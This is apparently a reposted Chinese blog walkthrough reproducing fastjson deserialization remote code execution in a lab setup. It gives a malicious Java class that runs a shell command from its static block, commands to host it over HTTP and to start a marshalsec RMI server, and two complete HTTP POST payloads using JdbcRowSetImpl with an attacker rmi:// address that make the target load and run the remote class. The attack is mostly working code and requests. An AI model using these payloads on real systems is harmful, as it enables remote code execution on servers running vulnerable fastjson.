fastjson rce相关复现
2021-05-29 02:02
标签:rgba catch 文件 成功 clr sha fastjson ble python版本
实验环境
攻击机:Win 10(物理机)、ubantu16(公网环境,恶意java文件所在服务器)
靶机: ubantu18
注意
1.Ubuntu18开启恶意加载RMI的java环境需要为低版本1.8的任意版本
2.要有清晰的思路
3.python的简易网站使用的python版本为2.X(python -m SimpleHTTPServer 6666),3.X可直接使用
大致流程:
编写恶意类 --> 编译为class文件 --> 在class的目录用python开一个HTTP服务 --> marshalsec起一个RMI服务 --> 构造包触发反序列化点远程加载恶意类 --> 执行命令
①编写恶意类
在ubantu16上,写入一个java文件 TouchfIle.java 放在根目录/root,如果是windows的话就看着放,比如PHPSTUDY放WWW里
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
②编译成class javac TouchFile.java
③在class文件的目录里用python开启简易HTTP服务
python3 -m http.server 4444
④marshalsec起一个RMI服务
1.首先apt install marshalsec 安装哈
2.然后apt install maven 安装maven要编译
3.mvn clean package -DskipTests 编译marshalsec
4.进入marshalsec/target里,存在以下两个可以调用开启RMI服务的jar包
使用以下命令:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vpsIP:PORT/#TouchFile" 9999
这里的vpsIP是指你的公网的开启web后放入TouchFile.class的那台服务器。本意为,使用marshalsec-0.0.3-SNAPSHOT-all.jar在本机的9999端口开启一个RMI服务加载TouchFile.class文件。
⑤物理机抓包,并修改内容,GET改为POST
POST / HTTP/1.1
Host: 45.77.127.27:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 163
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://144.202.80.85:9999/TouchFile",
"autoCommit":true
}
}
⑥靶机成功执行命令
json1.2.47 rce利用方式是一样的,只是把payload换成下面这个:
POST / HTTP/1.1
Host: vpsA:8090
Accept: */*
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE)
Connection: close
Content-Length: 266
Content-Type: application/json
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://vpsB:9999/Exploit",
"autoCommit":true
}
}
fastjson rce相关复现
标签:rgba catch 文件 成功 clr sha fastjson ble python版本
原文地址:https://www.cnblogs.com/paku/p/14753388.html
上一篇:Bugku CTF_web4
下一篇:免费刷步数网站 - 刷步数教学